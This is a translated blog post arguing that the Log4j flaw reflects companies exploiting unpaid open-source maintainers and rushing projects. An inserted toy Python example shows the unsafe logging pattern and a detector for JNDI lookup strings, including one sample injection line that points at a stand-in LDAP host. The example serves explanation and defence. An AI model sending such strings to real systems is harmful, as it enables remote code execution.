May 2, 2024

The mountain of shit theory

Uriel Fanelli's blog in English

Log4j, Log4j… the ceiling you dirty me.

The new bug in a library widely used in the Java world, for the sole purpose of writing strings to a file, is causing a sensation in the IT world. In practice, instead of using fprintf(), our heroes had invented a catastrophic contraption of enormous complexity, with the result that at some point they lost control of it.

“Our heroes” are those “Full Stack Exchange Developers” who, when they asked how best to do logging, were told “use log4j, why learn to write strings to a file? It could make your brain explode!”. I mean the average programmer of today.

The result is that someone has written a piece of software that interprets the strings it is asked to write to the logs. It does things. And if you tell it to log a specific string, it interprets it and goes off to call an LDAP server which, among its attributes, hands it code to execute.
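To make the design flaw concrete, here is an added illustration; it is not log4j's code and not from the original post. A toy Python logger with two offline lookups (a fixed `date`, and an `env` lookup backed by a constructed table, so nothing touches the network or the real environment) is written first in the interpreting style the post criticises, where the whole finished line, message included, is scanned for `${name:arg}` lookups, and then in the safer style where only the operator's template is interpreted and the message is inserted as plain data. A small detector for the lookup prefix, of the kind a defender would run over web or application logs, rounds it off. All names, templates and sample lines are constructed.

```python
import re
from datetime import date

# Constructed environment table: stands in for the process environment so the
# example is deterministic and reads nothing from the real machine.
FAKE_ENV = {"TOY_SECRET": "hunter2", "APP": "demo"}

# Offline lookups the toy logger understands. A real lookup that reached out to
# a directory server over the network would be the disaster the post describes.
LOOKUPS = {
    "date": lambda arg: date(2024, 5, 2).isoformat(),  # fixed date for reproducibility
    "env": lambda arg: FAKE_ENV.get(arg, ""),
}

# ${name:arg} with a purely alphabetic name; unknown names are left untouched.
LOOKUP_RE = re.compile(r"\$\{([A-Za-z]+):([^}]*)\}")


def expand_lookups(text: str) -> str:
    """Replace every ${name:arg} in text with the result of the named lookup."""
    def repl(m: re.Match) -> str:
        fn = LOOKUPS.get(m.group(1))
        return fn(m.group(2)) if fn else m.group(0)
    return LOOKUP_RE.sub(repl, text)


def log_interpreting(template: str, message: str) -> str:
    """Vulnerable pattern: the untrusted message is merged into the line first and
    the whole line is then interpreted, so whoever controls the message controls
    which lookups run (here: an environment value leaks into the log)."""
    line = template.replace("%m", message)
    return expand_lookups(line)


def log_plain(template: str, message: str) -> str:
    """Safer pattern: lookups are expanded only in the operator-controlled template;
    the message is inserted afterwards and is never interpreted."""
    line = expand_lookups(template)
    return line.replace("%m", message)


# Detection helper: the lookup prefix that drives the directory-server call the
# post talks about. Case-insensitive, tolerates stray whitespace.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def looks_like_lookup_injection(line: str) -> bool:
    """True if a log or request line carries a ${jndi: lookup string."""
    return JNDI_RE.search(line) is not None


if __name__ == "__main__":
    template = "[${date:}] %m"
    untrusted = "user agent was ${env:TOY_SECRET}"
    print("interpreting:", log_interpreting(template, untrusted))
    print("plain:       ", log_plain(template, untrusted))
    # Constructed sample lines of the sort a defender would scan.
    for sample in ["GET / 200 ua=Mozilla/5.0", "GET / 200 ua=${jndi:ldap://host.example/x}"]:
        print(looks_like_lookup_injection(sample), sample)
```

The toy's `jndi` name is deliberately not in `LOOKUPS`, so even the interpreting logger leaves such a string as-is; the point of `log_interpreting` is only to show that message content is being executed by the formatter at all, which is the design choice the rest of the post is about.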

But even so, we had better try to understand why this keeps happening.

In itself, it is open-source software. And in theory, open-source software is expected to have a robust community of developers who, being able to read the code, fix vulnerabilities easily. What is that robust developer community called? It is called “Ralph Goers”. ( https://www.ralphgoers.com/ )

[Image; alt text: “Log4j, Log4j… the ceiling you dirty me.”]

The “robust community” is one person who does log4j in his spare time, after work.

Wow.

Is he paid to do it? No. He might say “sorry, I'm on the beach, it's my vacation, I'll be back next month, if my software doesn't work stop using it until I'm back”. And there would be nothing strange about it.

This isn't the first time this has happened, and it won't be the last.

Years ago the developer of GPG said that, because he wanted to eat three times a day, he intended to find a well-paid job and would therefore suspend development of the software on which much of Linux's userspace encryption is based. Only then did some companies realize they had some loose change and found a way to pay him a salary for what he did.

Soon after, it was discovered that OpenSSL, the other leg of open-source encryption, had a memory bug that blew up in everyone's face. And it turned out that everything was done by 3 programmers who worked for OpenBSD, obviously unpaid or paid shit, in their free time.

So, the pattern is clear:

[Image; alt text: “Log4j, Log4j… the ceiling you dirty me.”]

But to ALSO explain the problem, it would be better to use THIS image:

[Image; alt text: “Log4j, Log4j… the ceiling you dirty me.”]

Because that's EXACTLY the problem.

Large companies make excessive use of open-source software. And they don't do it because it is better or safer: they do it because it COSTS NOTHING.

Instead of buying licenses, managers say “use Linux, it's free”.

When the open-source movement was born, programmers counted on, or hoped for, a model similar to the earlier shareware one, that is, “some will like it and send us money, others will help improve it, others will spread it”.

But the reality is that they have become “the idiots who work for free”. So it can happen that in the Microsoft cloud the vast majority of virtual machines are made from Linux images. Microsoft makes billions from this. Has any Linux developer ever seen even a fraction of those billions? Obviously not.

Then you will tell me that there are foundations that receive big donations from large companies, and my answer is: ok. But I'm talking about programmers. Do they get this money?

The answer is in the Mozilla Foundation and its balance sheet. If you haven't followed the whole story: the usual managerz are overpaid while the programmers are treated like shit.

For companies, open source has become a world where there are idiots who work for free, get treated like shit and even take insults if they make a mistake, and it costs them nothing.

The result is programmers less and less happy to program. Another case was the MetalLB programmer (at the time the only one), who received a threat of being sued for damages if he didn't fix a bug by the end of the weekend. He replied that he worked on it in his spare time, that people who thought they could treat him like a rag were pissing him off, and that he was thinking of quitting.

Since without MetalLB half of the “Kubernetes experts” would shoot themselves in the mouth, other people jumped in to help him, and the company in question received so much hatred from the internet that it preferred to apologize. But the point remains the same: for many managers, open-source software is made by fools who work for free, and since they work for you, you can also treat them like shit.

This software did a very simple thing: write an application's logs in a certain format. In a C-like language, it was the equivalent of fprintf(). Since learning fprintf() is too difficult for the average monkey, many preferred to use that instead: so it ended up everywhere, or almost. Moral: a mess.

Such rubbish exists in almost all languages by now, and mainly serves to spare a programmer the effort of learning standard libraries that already do the same thing.

And then we have:

  • Commons I.
  • Guava
  • JUnit
  • Jackson
  • JAXB
  • AssertJ
  • Hibernate
  • HTTPComponents
  • Xerces2
  • Javassist
  • CgLib
  • Jms
  • SQM
  • Joda (I miss the dates …)
  • Finds
  • Jsoup
  • Netty / MINA

Almost all languages now have this kind of proliferation of third-party libraries, and each of these has a different origin, a different lifecycle, and obviously an equal chance of being “infected”.

What's going wrong?

Well, this is what happens. Imagine you are a woman. You have to have a child. The manager comes and says “they cut our budget. From today, children are made in 8 months”. Now, with the new low-cost caesarean section technique, it's quite feasible. It's not nice, but it's doable.

The following year, same thing. Now you have to do it in 7 months. Again, with a bit of incubator and cutting, it can be done.

But by dint of “increasing productivity simply by promising the customer shorter deadlines”, it has come to the point that our woman goes to orphanages to stock up on children.

If once the manager believed that nine women could have a child in a month, today someone has convinced them that ONE woman can have a child in a month if she does DevOps, has CI/CD, and the child is open source.

In practice, ONE programmer is asked to work in parallel.

At that point, programmers simply download libraries. This is also due to a certain lack of creativity on the part of companies, which all ask for the same thing in the same way.

The project times are calculated with such arrogance and superficiality that today they would ask God to make the universe in three days. And no, “Agile / Scrum” only made it worse.

This continuous compression of costs, without technologies that REALLY make development more productive, means that the most followed strategy is to reuse software written by others. It's free.

With the result that we will spend the next 15 years, as IT becomes more crucial and is used for really important things, finding out how many errors and how many security problems derive from the blind adoption of libraries that, yes, are open source, but that no programmer has ever thoroughly examined, BECAUSE THERE WAS NO TIME.

The next 15 years of IT adoption will be a period of periodic data leaks, hackers penetrating systems, exponential increases in cybersecurity spending, ransomware and more.

Because there is no such thing as a free lunch, and if you save a month on your project by using a library you download for free, sooner or later it will cost you exactly that much to fix that library's flaws.
